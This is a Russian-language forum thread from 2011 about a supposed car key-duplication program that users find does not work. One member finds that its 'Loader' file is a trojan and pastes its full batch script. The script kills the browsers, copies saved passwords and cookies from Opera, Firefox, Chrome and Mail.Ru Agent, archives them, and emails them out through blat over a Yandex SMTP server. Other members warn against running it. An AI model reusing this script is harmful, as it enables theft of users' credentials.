Goha 75 Опубликовано 8 мая, 2011 Поделиться Опубликовано 8 мая, 2011 (изменено) привет всем вот нарыл ссылку мож кто в теме двоилка м73 Изменено 11 мая, 2011 пользователем MEG-2 4 Ссылка на комментарий Поделиться на другие сайты Поделиться
viro Опубликовано 9 мая, 2011 Поделиться Опубликовано 9 мая, 2011 Ключик не открывается. Ссылка на комментарий Поделиться на другие сайты Поделиться
kai-777 Опубликовано 9 мая, 2011 Поделиться Опубликовано 9 мая, 2011 В 08.05.2011 в 22:06, Goha 75 сказал: привет всем вот нарыл ссылку мож кто в теме двоилка м73 http://depositfiles.com/ru/files/8n8ed4f01 А ты сам пробовал прога не работает Ссылка на комментарий Поделиться на другие сайты Поделиться
Goha 75 Опубликовано 9 мая, 2011 Автор Поделиться Опубликовано 9 мая, 2011 В 09.05.2011 в 06:22, kai-777 сказал: А ты сам пробовал прога не работает ВОТ смотри рно как снею работать увы не вьеду Ссылка на комментарий Поделиться на другие сайты Поделиться
ekonstantin Опубликовано 9 мая, 2011 Поделиться Опубликовано 9 мая, 2011 (изменено) Файл Loader при просмотре очень похож на трояна. Ага, он и есть :) Создает файл C:\WINDOWS\Prefetch\Blat.exe Также там присутствуют строки taskkill /f /im opera.exe taskkill /f /im firefox.exe taskkill /f /im chrome.exe taskkill /f /im iexplore.exe taskkill /f /im magent.exe md C:\pass\ copy /y "blat.dll" "%SystemRoot%\blat.dll" copy /y "blat.exe" "%SystemRoot%\blat.exe" copy /y "blat.lib" "%SystemRoot%\blat.lib" copy /y "Rar.exe" "%SystemRoot%\Rar.exe" attrib C:\pass +h +s +a +r md C:\pass\opera\ CD /D %APPDATA%\Opera\Opera\ copy wand.dat C:\pass\opera\ >nul copy cookies4.dat C:\pass\opera\ >nul md C:\pass\MailAgent\reg regedit.exe -ea C:\pass\MailAgent\reg\agent.reg "HKEY_CURRENT_USER\software\Mail.Ru\Agent\magent_logins2 regedit.exe -ea C:\pass\MailAgent\reg\agent_3.reg "HKEY_CURRENT_USER\software\Mail.Ru\Agent\magent_logins3 CD /D %APPDATA% Xcopy Mra\Base C:\pass\MailAgent /K /H /G /Q /R /S /Y /E >nul Xcopy Mra\Update\ver.txt C:\pass\MailAgent /K /H /G /Q /R /S /Y >nul md C:\pass\Mozilla\ cd %AppData%\Mozilla\Firefox\Profiles\*.default\ copy cookies.sqlite C:\pass\Mozilla\ >nul copy key3.db C:\pass\Mozilla\ >nul copy signons.sqlite C:\pass\Mozilla\ >nul md C:\pass\Google\ cd %userprofile%\Local Settings\Application Data\Google\Chrome\User Data\Default\ copy /y Login* C:\pass\Google\ >nul copy /y Web Data* C:\pass\Google\ >nul copy /y Cookies* C:\pass\Google\ >nul copy /y %Windir%\Rar.exe C:\pass\ >nul C:\pass\rar.exe a -r C:\pass\pass.rar C:\pass\ copy /y %Windir%\blat.dll C:\pass\ copy /y %Windir%\blat.exe C:\pass\ copy /y %Windir%\blat.lib C:\pass\ del /s /q %SystemRoot%\Rar.exe del /s /q %SystemRoot%\blat.dll del /s /q %SystemRoot%\blat.exe del /s /q %SystemRoot%\blat.lib cd C:\pass\ blat.exe -install -server smtp.yandex.ru -port 587 -f sender.qq@yandex.ru -u sender.qq -pw qazxsw1213 ren *.rar pass.rar blat.exe -body surpriz -to fj0001@yandex.ru -attach pass.rar cd %Windir% rmdir /s /q C:\pass EXIT Изменено 9 мая, 2011 пользователем ekonstantin Ссылка на комментарий Поделиться на другие сайты Поделиться
Борис Р Опубликовано 9 мая, 2011 Поделиться Опубликовано 9 мая, 2011 В 09.05.2011 в 13:53, Goha 75 сказал: ВОТ смотри рно как снею работать увы не вьеду как запустить программу Ссылка на комментарий Поделиться на другие сайты Поделиться
Nemec Опубликовано 11 мая, 2011 Поделиться Опубликовано 11 мая, 2011 на самом деле ничего вы не запустите, а вот Loader собирает пароли из браузеров и пытается куда-то отправить. автору башку открутить за это надо Ссылка на комментарий Поделиться на другие сайты Поделиться
magelan1 Опубликовано 12 мая, 2011 Поделиться Опубликовано 12 мая, 2011 (изменено) Купите у автора (Dik) за 100 уе и не парьтесь, отобьется на нескольких машинах ,и все таки поддержка есть , а если кому нужно слепить двойную , стучитесь в личку. Изменено 12 мая, 2011 пользователем magelan1 Ссылка на комментарий Поделиться на другие сайты Поделиться
v vovanshu Опубликовано 13 мая, 2011 Поделиться Опубликовано 13 мая, 2011 Подтверждаю, после запуска лоайдера, сразу создается соединение и начинает ломиться в инет, авира это очень хорошо видит. Так, что не запускайте файл. А автора в бан пожизненный. Ссылка на комментарий Поделиться на другие сайты Поделиться
fcctuning Опубликовано 13 мая, 2011 Поделиться Опубликовано 13 мая, 2011 Всегда говорил Халява хорошей не бывает Ссылка на комментарий Поделиться на другие сайты Поделиться
Рекомендуемые сообщения
Для публикации сообщений создайте учётную запись или авторизуйтесь
Вы должны быть пользователем, чтобы оставить комментарий
Создать аккаунт
Зарегистрируйте новый аккаунт в нашем сообществе. Это очень просто!
Регистрация нового пользователяВойти
Уже есть аккаунт? Войти в систему.
Войти